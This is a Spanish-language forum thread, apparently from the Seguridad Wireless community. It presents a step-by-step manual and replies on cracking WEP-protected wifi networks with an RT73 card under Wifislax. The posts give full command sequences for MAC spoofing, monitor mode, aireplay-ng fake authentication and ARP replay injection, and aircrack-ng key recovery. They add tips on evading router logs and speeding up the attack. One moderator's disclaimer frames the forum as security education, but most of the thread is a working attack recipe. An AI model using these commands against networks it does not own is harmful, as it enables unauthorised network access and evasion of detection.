Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación?
03-Diciembre 07:59:09 (Mircoles)
Inicio Ayuda Ingresar Registrarse


+  Seguridad Wireless
|-+  Suite Seguridad Wireless
| |-+  Manuales de Wifislax & Wifiway (Moderadores: ChimoC, the_often, chinitiw, drvalium)
| | |-+  Mini manual rt73 + Wifislax
0 Usuarios y 2 Visitantes están viendo este tema. « anterior próximo »
Páginas: 1 2 3 4 5 » Imprimir
Autor Tema: Mini manual rt73 + Wifislax  (Leído 37154 veces)
hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3508



WWW
« en: 20-Febrero 23:58:17 (Martes) »

Lo primero que debemos hacer es un iwconfig para saber si no detecta el chip rt73 o rt2570, bueno si al lado de rausb0 no pone rt73 hacemos lo siguiente:
Citar
ifconfig rausb0 down
macchanger -m 00:11:22:33:44:55 rausb0
Si si por el contrario no nos detecta el rt73 a estas lineas le añadimos:
Citar
rmmod rt73
rmmod rt2570
modprobe rt73
Para finalizar la configuracion de la tarjeta hacemos lo siguiente:
Citar
ifconfig rausb0 up
iwconfig rausb0 mode monitor
Con esto hecho podemos empezar a utilizar los programas especificos. Hacemos lo siguiente:
Citar
airodump-ng rausb0
Con esto comprobamos cual es el canal de ap a atacar y tambien el bssid luego abrimos otra terminal y con el aireplay-ng hacemos de la siguiente forma:
Citar
aireplay-ng -1 30 -e Nombre_del_ap -a mac_del_ap -h 00:11:22:33:44:55 rausb0
Y en otra terminal distinta hacemos lo siguiente:
Citar
aireplay-ng -3 -b mac_del_ap -h 00:11:22:33:44:55 rausb0
Para finalizar en una terminal abrimos el airodump-ng de la siguinte forma:
Citar
airodump-ng -c canal_ap -w nombre_archivo rausb0
Con esto lo que nos queda es esprar a que el aireplay-ng coja el arp. Para finalizar lo que tenemos que hacer es

Citar
aircrack-ng -z archivo.cap rausb0

Y Ya esta Grin Grin


« Última modificación: 09-Marzo 10:18:13 (Domingo) por hadrianweb » En línea


Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 10983



WWW
« Respuesta #1 en: 21-Febrero 22:50:15 (Mircoles) »

PUes esta bastante claro.
En línea





djdava
*
Desconectado Desconectado

Mensajes: 27


« Respuesta #2 en: 25-Abril 14:25:00 (Mircoles) »

Hola, pues me surge un problema al utilizar los comandos que pone hadrianweb en el mini manual para las rt73. Lo que hago es exactamente lo que pone en ese manual, es decir pongo la rt73 en modo monito, en el mismo canal y con el essid del AP de esta forma:

iwconfig rausb0 mode monitor channel 11 essid default

Despues enxufo el airodump-ng en el canal 11, hago el ataque 1 y despues el ataque 3 igual como pone en el manual y me sale un error, diciendome que no estoy associado al AP y no me suben los data. He probado un monton de cosas y no se ke mas hacer. Os dejo una captura de lo que me pasa, a ver si me podeis ayudar.

P.D: para hacer el atake 1 me cambio la MAC, por la de un cliente que se suele conectar al AP.



Saludos!!
En línea

Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 10983



WWW
« Respuesta #3 en: 25-Abril 15:08:22 (Mircoles) »

si el cliente es wireless, no seria mejor esperar y efectuar directo un ataque 3.

Aparentemente todo esta correcto.

Es cuestion de espera.

¿que velocidad has fijado, me refiero al iwconfig rausb0 rate X?
En línea





djdava
*
Desconectado Desconectado

Mensajes: 27


« Respuesta #4 en: 25-Abril 15:36:41 (Mircoles) »

Tambien he probado de realizar el atake 3 cuando hay cliente conectado, pero me pasa exactamente lo mismo. Coje un ARP , enpiezan a subir los "sent", el data ni se mueve y me aparece el mismo error de desautentificacion.

El rate lo dejo como está por defecto, osea ke no lo toco.

pego aki lo ke me sale en el iwconfig?

Gracias y saludos!
En línea

jmvalles
****
Desconectado Desconectado

Mensajes: 270



« Respuesta #5 en: 26-Abril 21:12:30 (Jueves) »

A mi me pasaba muchas veces esto, hasta que me hice una antena.
Puede ser que la señal sea muy débil
En línea
djdava
*
Desconectado Desconectado

Mensajes: 27


« Respuesta #6 en: 03-Mayo 14:02:39 (Jueves) »

Pues he modificado mi C54RU y le he puesto una antenita de una tarjeta pci que tenia por casa y he logrado desencriptar otra red muy rapido y con una inyeccion de 500ivs por segundo (que esta muy bien, o eso creo). Pero la red en cuestion que comentaba antes, sigo sin hacerme con ella. Me sigue pasando exactamente lo mismo. Me esta volviendo lo co el maldito error de desautentificacion!

De todas formas gracias por contestar.

Saludos!
En línea

jlara1112
*
Desconectado Desconectado

Mensajes: 3


« Respuesta #7 en: 07-Mayo 00:26:12 (Lunes) »

Hola hadrianweb, gracias por el manual, tengo una rt73 usb y uso wifiway (ya que tengo tambien una broadcom que no me deja cargar wifislax) y hago todos los pasos porque no me la reconoce como rt73 aunque lo de macchanger lo tengo que hacer despues de lo de modprobe rt73 porque sino se me pone en 00:00:00:00:00 o en la original, y con el ataque 1 se me queda en sending autentificatio request y con el ataque 3 no me consigue ningun arp
¿porqué puede ser?

Aunque hoy me ha cogido 6 y ha enviado 300 y pico y se a parado pero creo que era porque había un cliente conectado, los data me han subido muy despacio y creo que era por el cliente, no porque estuviera inyectando. otra pergunta, ¿cuando hay un cliente conectado solo se hace el ataque 3, tambien se hace el 1 con 00:11... o se hace tambien el uno pero cambiando la mac a la suya?

Tambien he probado a cambiar el rate a 1M pero sigue igual.

Cuando hago el ataque 1 en el airodump aparezco como cliente pero se queda en sending autentification request y al rato desaparezco del airodump.

Antes de ver tu manual, haciendo pruebas conseguí que el ataque 1 me dijera succesful pero el ataque 3 no me cogía ningun arp y ademas al rato tambien desaparecia del airodump.

De nuevo muchas gracias por el manual y a ver si me puedes echar una mano ya que con la broadcom despues de mucho intentarlo tiré la toalla y me compre la ralink pensando que iba a conseguirlo sin problemas y todavía no he conseguido inyectar en condiciones.

P.D: ¿En el wifiway que secuencia hay que poner? (wlandecrypter bssid essid ...?)

P.D2: ¿Hay alguna forma de cargar el módulo de la rt73 únicamente despues de haber cargado con ws nohotplug en wifislax? esque no puedo cargar de otra manera.
« Última modificación: 07-Mayo 00:29:22 (Lunes) por jlara1112 » En línea
Carballo
*
Desconectado Desconectado

Sexo: Masculino
Mensajes: 26


« Respuesta #8 en: 12-Mayo 23:27:45 (Sbado) »

Acabo de comprarme una c54ru (chip rt73) y he estado probando que tal iva. He probado con una wifi y los resultados me parecen que no son los que deberian. En hora y media ha recibido 65000 paquetes y ninguno es ARP. No aparecen errores por ningun sitio y he seguido los todos los pasos sin problemas. Ahora bien, es normal lo que pasa o quizas he echo algo mal?

PD. en la captura se ven los AP, el segundo es con el que he estado probando.


En línea
lampi
***
Desconectado Desconectado

Mensajes: 176



WWW
« Respuesta #9 en: 12-Mayo 23:39:55 (Sbado) »

No te preocupes que si funciona,
En línea

Carballo
*
Desconectado Desconectado

Sexo: Masculino
Mensajes: 26


« Respuesta #10 en: 12-Mayo 23:43:29 (Sbado) »

entonces es normal?

pues mañana lo dejare mas tiempo a ver si pilla algun ARP y os cuento Smiley
En línea
Carballo
*
Desconectado Desconectado

Sexo: Masculino
Mensajes: 26


« Respuesta #11 en: 13-Mayo 18:39:49 (Domingo) »

nada de nada, mas de 300.000 paquetes y ni uno solo ARP, buscando por ahi he visto alguna solucion usando el airodump-ptw
En línea
hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3508



WWW
« Respuesta #12 en: 13-Mayo 22:35:01 (Domingo) »

si el aircrack-ptw solo necesita 50000ivs para revolverla.

Y sino utiliza el ataque 0 para acelerar el proceso, eso si hay cliente conectados Grin Grin
En línea


Carballo
*
Desconectado Desconectado

Sexo: Masculino
Mensajes: 26


« Respuesta #13 en: 13-Mayo 23:17:32 (Domingo) »

el fin de semana no habia nadie conectado y entre semana no podre asi que habra que esperar hasta el fin de semana que viene
En línea
Carballo
*
Desconectado Desconectado

Sexo: Masculino
Mensajes: 26


« Respuesta #14 en: 19-Mayo 17:11:29 (Sbado) »

he estado probando y no hay forma de que se asocie con ninguna ap, ni on un cliente ni de ninguna otra forma. Lo intenta unas cuantas veces y salta un error dando unas posibles motivos por los que no ha podido asociarse
En línea
hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3508



WWW
« Respuesta #15 en: 20-Mayo 23:42:48 (Domingo) »

En primer luego deberias bajar el rate, es decir

Código:
iwconfig rausb0 rate 1M

Si el error continua es probable que sea por que te encuentres muy lejos del ap
En línea


jmvalles
****
Desconectado Desconectado

Mensajes: 270



« Respuesta #16 en: 21-Mayo 00:55:27 (Lunes) »

hadrianweb...¿qué se consigue bajando el rate?
¿equilibrar la subida/bajada? es que no lo acabo de pillar..... Huh
En línea
hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3508



WWW
« Respuesta #17 en: 21-Mayo 01:01:48 (Lunes) »

Jeje, mira esto

Citar
rate/bit[rate]
    For cards supporting multiple bit rates, set the bit-rate in b/s. The
    bit-rate is the speed at which bits are transmitted over the medium, the user speed of the link is lower due to medium sharing and overhead.
    You must append the suffix k, M or G to the value (decimal multiplier : 10^3, 10^6 and 10^9 b/s), or add enough '0'. Values below 1000 are card specific, usually an index in the bit-rate list. Use auto to select the automatic bit-rate mode (fallback to lower rate on noisy channels), which is the default for most cards, and fixed to revert back to fixed setting. If you specify a bit-rate value and append auto, the driver will use all bit lower and equal than this value.
    Examples :
    iwconfig eth0 rate 11M
    iwconfig eth0 rate auto
    iwconfig eth0 rate 5.5M auto

Si quieres te lo traduzco pero no creo que sea necesario Grin Grin
En línea


adrian_oca
*
Desconectado Desconectado

Mensajes: 6


« Respuesta #18 en: 14-Junio 01:29:13 (Jueves) »

En primer luego deberias bajar el rate, es decir

Código:
iwconfig rausb0 rate 1M

Si el error continua es probable que sea por que te encuentres muy lejos del ap

Perdón por no haberme presentado antes, yo tengo el mismo problema que tratan aquí, bajo muchos paquetes pero casi nada de datos ni ARP, voy a intentar esto y luego les comento.

mi problema es este:

Este fin de semana pasado se me presentó un problema que no había visto, ya cuando lanzaba el ataque con el WIFISLAX si me capturaba un muchos paquetes pero muy pocos IV´s o datos, las peticiones ARP también eran muy pocas, por ejemplo:

Los paquetes ya sumaban alrededor de 600,000 y los IV´s eran como 200 y las ARP eran como 40... y eso que me pasé como dos horas ahí mondadeando... 

Ya he estado leyendo y según esto puede ser por 4 razones:

1.-Te encuentras demasiado lejos del punto de acceso.
2.-No hay tráfico en la red escogida.
3.-Hay tráfico de tipo G pero estás capturando en modo B.
4.-Hay algún problema con tu tarjeta (¿problema de firmware ?)


Quizá pueda ser por la distancia, pregunta: ¿Puede ser esto posible aunque reciba 45% de señal del AP?

Después seguí leyendo y se me hace más real esto:

Algunos puntos de acceso requieren de reautentificación cada 30 segundos, si no nuestro cliente falso será considerado desconectado. En este caso utiliza el retardo de re-asociación periódica:

aireplay -1 30 -e "el ssid" -a "el BSSID" -h 00:11:22:33:44:55 ath0

Si este fuese mi problema y ya que yo uso el controlador rt2570 (Ralink b/g USB) al momento de darlo "de alta" lo identifico como "rausb0", pregunta:

¿En la sentencia aireplay -1 30 -e "el ssid" -a "el BSSID" -h 00:11:22:33:44:55 ath0 es correcto terminar con "ath0" o le pongo "rausb0"?

Agradezco a todos de antemano, espero y me puedan resolver mi duda...
En línea
lagartija
*
Desconectado Desconectado

Sexo: Masculino
Mensajes: 20


« Respuesta #19 en: 14-Junio 07:39:32 (Jueves) »

hola
te respondo rapidamente.. tu interfase es usb osea esta identificada como rasub0...

el comando que tienes que poner es

aireplay -1 30 -e "el ssid" -a "el BSSID" -h 00:11:22:33:44:55 rausb0

ceo que te respondias solito.. pero por si las dudas..

saludos Smiley Smiley Smiley Smiley Smiley Smiley
En línea
adrian_oca
*
Desconectado Desconectado

Mensajes: 6


« Respuesta #20 en: 15-Junio 00:33:51 (Viernes) »

hola
te respondo rapidamente.. tu interfase es usb osea esta identificada como rasub0...

el comando que tienes que poner es

aireplay -1 30 -e "el ssid" -a "el BSSID" -h 00:11:22:33:44:55 rausb0

ceo que te respondias solito.. pero por si las dudas..

saludos Smiley Smiley Smiley Smiley Smiley Smiley

Gracias Lagartija esa duda es la que tenía y no la he puesto en prueba porque sólo tengo oportunidad de dedicarle tiempo a eso el fin de semana, ya sabes el trabajo...  si sonaba algo lógico pero quería estar seguro que era así...

y sobre mi problema principal de no obtener Datos, crees que con eso se resuelva???

Gracias de antemano
En línea
lagartija
*
Desconectado Desconectado

Sexo: Masculino
Mensajes: 20


« Respuesta #21 en: 15-Junio 07:29:36 (Viernes) »

Adrian_oca--.

Bueno te respondo como yo lo solucione.. Va es una sugerencia.. Aunque por estos foros no esta bien visto.. pero no importa mucho
.. si e vez de poner una MAC falsa a tu tarjeta, utilizas la MAC verdadera... seguramente se te soluciona.. lo que dicen en los foros es que uno no debe utilizar la MAC verdadera.. pero en realidad creo yo que no hay mucho problema... piénsalo.. y intenta
por si las dudas te doy mas pistas. ósea

te doy todos los comandos.. no tiene sentido que te pongas  investigar y que nadie te responda clara mente..


rmmod rt73
rmmod rt2570
modprobe rt73
ifconfig rausb0 up
iwconfig rausb0 mode monitor
airodump-ng rausb0
aireplay-ng -1 30 -e Nombre_del_ap -a mac_del_ap -h "MACVERDADERA" rausb0
aireplay-ng -3 -b mac_del_ap -h "MAC VERDADERA" rausb0

airodump-ng -c canal_ap --ivs rausb0

aircrack-ng archivo.ivs rausb0


SOLO tome cosas que han hecho compañeros y le puse "MAC verdadera" donde deberías poner el numero.. si no sabes como leerlo.. es muy fácil
da vuelta tu usb.. y ahí leerás el numero.. casi todas lo tienen.. acuérdate que tienen que ser 10 caracteres mayormente letras acompañados por números..

si tienes problemas pregunta y te ayudo..

bueno espero que te sirva..
 Smiley Smiley Smiley Smiley Grin Grin Grin Grin :Smiley :Smiley Smiley Smiley

lagartija
En línea
hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3508



WWW
« Respuesta #22 en: 15-Junio 08:57:25 (Viernes) »

 Grin Grin Nunca he comprobadoesa teoria lagartija, pero el dia que cambiando la mac no me funcione, seguro que la pondre en practica Grin Grin

Dos sugerencias:

  1º- Deberias poner al pricipio de todo
           ifconfig rausb0 down
        Por si la interfaz, esta subida.
   2º- Con el wifislax 2.0 puedes utilizar airoscript, que es mas facil y ademas coge                    antes el arp y te cambia la mac por una falsa, generalmente 00:01:02:03:04:05
En línea


the_often
Moderador
******
Desconectado Desconectado

Mensajes: 698


« Respuesta #23 en: 15-Junio 10:15:24 (Viernes) »

Confirmo que es totalmente cierto lo que dice lagartija sobre la MAC verdadera.   Porque logicamente, el cliente falso lo podemos crear con cualquier MAC, incluso con la nuestra real sin cambiarla.

Y a veces hasta funciona mejor si no la cambiamos, o si la cambiamos por una que MAC que 'tenga sentido', porque me he encontrado con APs que conceden asociacion mucho mas facilmente a MACs que puedan existir que a MACs del tipo 00:11:22:33:44:55.  y si lo hacemos con la MAC de un cliente que ya haya estado ALGUNA VEZ asociado a ese router pues mejor aun.


Pero supongo que la razon de cambiar la MAC es por 'seguridad', para evitar quedar loggeados con nuestra MAC REAL en el router atacado.



Saludos! Smiley



P.D:  Por cierto, por curiosidad como es que este manual tan util sobre el rt73 está en electronica de antenas??  Hay copia puesta en algun otro sitio?? Lo digo por que igual sí que la hay y no la vi  Lips Sealed
« Última modificación: 15-Junio 10:22:07 (Viernes) por the_often » En línea

El cura en misa:  "...y dijo Jesús: 'Lázaro, levantate y anda'.  Y entonces Lázaro se levantó y andó..."

Y un feligrés le interrumpe:  "¡¡ <b>ANDUVO,</b>  ATONTAO !!"

El cura continua:  "Esto..., bueno sí,.. al principio anduvo un poco atontao..., pero luego andó....."   

Jejejeje!
adrian_oca
*
Desconectado Desconectado

Mensajes: 6


« Respuesta #24 en: 16-Junio 01:57:31 (Sbado) »


a ver... aver...

vamos a ponernos de acuerdo, creo que se me pasaron algunos detalles que deberían de saber...

lo primero que hago con el wifislax (el anterior a la versión 2.0) es esto, abro una hoja y ahí escribo lo siguiente:

ifconfig rausb0 down
macchanger -m 00:11:22:33:44:55 rausb0
rmmod rt73
rmmod rt2570
modprobe rt73
ifconfig rausb0 up
iwconfig rausb0 mode monitor


después lanzo el airoscript tal como se muestra en este video:

 http://personal.telefonica.terra.es/web/cod2/wifislax/ataque1.htm

Ya una vez hice ese procedimiento y me funcionó, tal como lo expongo, pero en esta ocasión sigo la receta al pie de la letra y no acumulo datos...

Ustedes creen que usando la sentencia aireplay -1 30 -e "el ssid" -a "el BSSID" -h 00:11:22:33:44:55 rausb0 se solucione?

Gracias de antemano
En línea
ChimoC
Moderador Global
******
Desconectado Desconectado

Mensajes: 3561



« Respuesta #25 en: 16-Junio 13:52:21 (Sbado) »

Hola adrian_oca:

La "sentencia" (como me suena esa palabreja Tongue) que has puesto es para hacer un A1 esto es una asociación falsa... luego debes hacer un A3 que sirva para que los DATAS te suban esto es la inyección

aireplay-ng -3 -b MAC AP -h MAC CLIENTE FALSO rausb0 -x 1024

Si fuera cliente legítimo... lo mismo pero cambias el MAC FALSO por el MAC  REAL....

Un saludo

ChimoC
En línea
adrian_oca
*
Desconectado Desconectado

Mensajes: 6


« Respuesta #26 en: 16-Junio 17:14:58 (Sbado) »

Hola adrian_oca:

La "sentencia" (como me suena esa palabreja Tongue) que has puesto es para hacer un A1 esto es una asociación falsa... luego debes hacer un A3 que sirva para que los DATAS te suban esto es la inyección

aireplay-ng -3 -b MAC AP -h MAC CLIENTE FALSO rausb0 -x 1024

Si fuera cliente legítimo... lo mismo pero cambias el MAC FALSO por el MAC  REAL....

Un saludo

ChimoC

Hola ChimoC, No les he contado  pero yo soy de Monterrey México, está ciudad esta hacia al norte del país y está muy cerca a la frontera texana entonces ya te imaginarás las costumbres, de hecho acá es muy común que la gente use sombrero a diario (o gorras no sé como los coonozcan ustedes, son los que usan los vaqueros) como los que usamos en este foro en los emoticons...

Según me acuerdo en primeros cursos de programación Sentencia se aplicaba a un enunciado, me tardo aproximadamente media hora en publicar un post ya que cuido mucho mis palabras para que me puedan entender y mira aún así se me escapan muchas.. bueno volvamos al tema...

Por lo que me dice ChimoC puedo entender que ya no necesito seguir los pasos del video y que lo tengo que hacer todo de modo manual, si esto fuese correcto hasta aquí entiendo lo siguiente:

ifconfig rausb0 down
macchanger -m 00:11:22:33:44:55 rausb0
rmmod rt73
rmmod rt2570
modprobe rt73
ifconfig rausb0 up
iwconfig rausb0 mode monitor

airodump-ng rausb0

aireplay-ng -1 30 -e Nombre_del_ap -a mac_del_ap -h 00:11:22:33:44:55 rausb0


y la siguiente línea sería la que me recomienda ChimoC

aireplay-ng -3 -b MAC AP -h MAC CLIENTE FALSO rausb0 -x 1024

airodump-ng -c canal_ap --ivs rausb0

y ya cuando tenga suficientes Datos lanzo el aircrack

aircrack-ng archivo.ivs rausb0

Pregunta, al escribir aircrack-ng archivo.ivs rausb0 en una terminal nueva, por default llama al archivo donde se encuentran los Datos???

Ya sé que son muchas preguntas y que más de uno se harta, soy un novato y sé que a veces es fastidioso andar contestando cosas que para muchos pueden ser hasta aburridas, por eso agradezco mucho al que se toma la molestia en leer y contestar  Grin

Utilizo el LiveCD entonces no puedo hacer capturas, hoy lo voy a intentar de nuevo y si algo se me dificulta tomaré una foto al monitor de la PC y se las comparto, pero espero que ya con esto se resuelva mi problema.

Gracias a todos
En línea
ChimoC
Moderador Global
******
Desconectado Desconectado

Mensajes: 3561



« Respuesta #27 en: 17-Junio 11:36:16 (Domingo) »

Hola adrian_oca:

Te digo paso a paso..... ok? Pero recuerda que este foro es para tratar sobre la inseguridad de redes... no para crackearlas....o reventarlas... sino para aprender a ver los fallos y mejorarr tu seguridad Wink

No hace falta que utilices (si no quieres)  la sentencia  Tongue de rmmod, si te das cuenta, en la versión de Wifislax 2.0 (ahora ya está la 3.0) te viene un lanzador que lo hace por tí.... asisitencia de chipset----------------> chipset ralink--------> forzar rt73 sobre rt2570.

Los diferentes ataques (A1, A3...) y el escaneo (airodump) los debes realizar en ventanas o shells diferentes.

Los dos ataques A1 y A3 son correctos, pero debes recordar que el A3 sobre el A1 a vece starda en funcionar y otras veces simplemente no funciona (protección de los AP contra el A1)

El airodump lo estás utilizando guardando IVS (ocupa mernos que los CAPs) pero tienes el inconveniente que no podrías utilizar el aircrack-ptw ...que sirve para desencriptar la clave WEP con unos 50000 datas (formato CAP)

airodump INTERFACE pruebas CANAL 0 (ejemplo: airodump ath0 pruebas 5 0      le estoy diciendo que me escanee el canal 5 y me guarde en formato CAP...... si el 0 lo cambio por un 1..... formato IVS)

airodump-ng -w prueba -c 5 ath0 (le estoy diciendo que me guarde en formato CAP y me escanee el canal 5)

airodump-ng --ivs -w prueba -c 5 ath0 (lo mismo pero que me guarde en IVS)

Y para el aircrack-ng escribes aircrack-ng FICHERO CAPTURAS.ivs o cap   o bien aircrack-ng *.cap y ya lo eliges   Wink

Mira una chincheta que te habla del aircrack-ptw y si tienes alguna pregunta no dudes en venir a esta tu casa  Grin

Creo que no se me ha olvidado nada (mmmm....  ayer un poquito de fiesta y me cabeza está algo cansada)

Saludos

ChimoC

P.D.: En cuanto al tema de las MACs (en el A1) .... hubo cierta discusión en algún foro.....


MAC FALSA INVENTADA:


Una dirección MAC es algo similar a: 00:09:5B:AC:BB:F2. La primera mitad (00:09:5B) de la dirección MAC se refiere al fabricante. La segunda mitad (AC:BB:F2) es única para cada aparato. Algunos puntos de acceso ignorarán direcciones MAC inválidas. Por lo tanto asegúrate de usar una dirección de un fabricante wireless válido cuando decidas cambiar la MAC. En otro caso los paquetes serán ignorados.
En línea
the_often
Moderador
******
Desconectado Desconectado

Mensajes: 698


« Respuesta #28 en: 17-Junio 14:48:12 (Domingo) »

Mu bien explicadito ChimoC, ojala alguien me lo hubiera explicao tan detalladamente en mis comienzos.....  o bueno igual no, porque si no seguramente me hubiese molestado menos en buscar y leer.....:Smiley


Lo de cambiarse la MAC es probar (como todo), hay routers que admiten una MAC totalmente falsa y otros que no la admiten.



Saludos!!
En línea

El cura en misa:  "...y dijo Jesús: 'Lázaro, levantate y anda'.  Y entonces Lázaro se levantó y andó..."

Y un feligrés le interrumpe:  "¡¡ <b>ANDUVO,</b>  ATONTAO !!"

El cura continua:  "Esto..., bueno sí,.. al principio anduvo un poco atontao..., pero luego andó....."   

Jejejeje!
Hwagm
Administrador
*
Desconectado Desconectado

Mensajes: 10983



WWW
« Respuesta #29 en: 18-Junio 15:14:33 (Lunes) »

para wifislax 3.0 a mi al menos ya la reconoce como rt73, os sigue apareciendo con el rt2570???
En línea





hadrianweb
Aleph-0
Moderador Global
******
Desconectado Desconectado

Mensajes: 3508



WWW
« Respuesta #30 en: 19-Junio 10:09:09 (Martes) »

no en la 3.0 ya aparece como rt73
En línea


askatuak
*
Desconectado Desconectado

Mensajes: 25


« Respuesta #31 en: 20-Junio 20:15:18 (Mircoles) »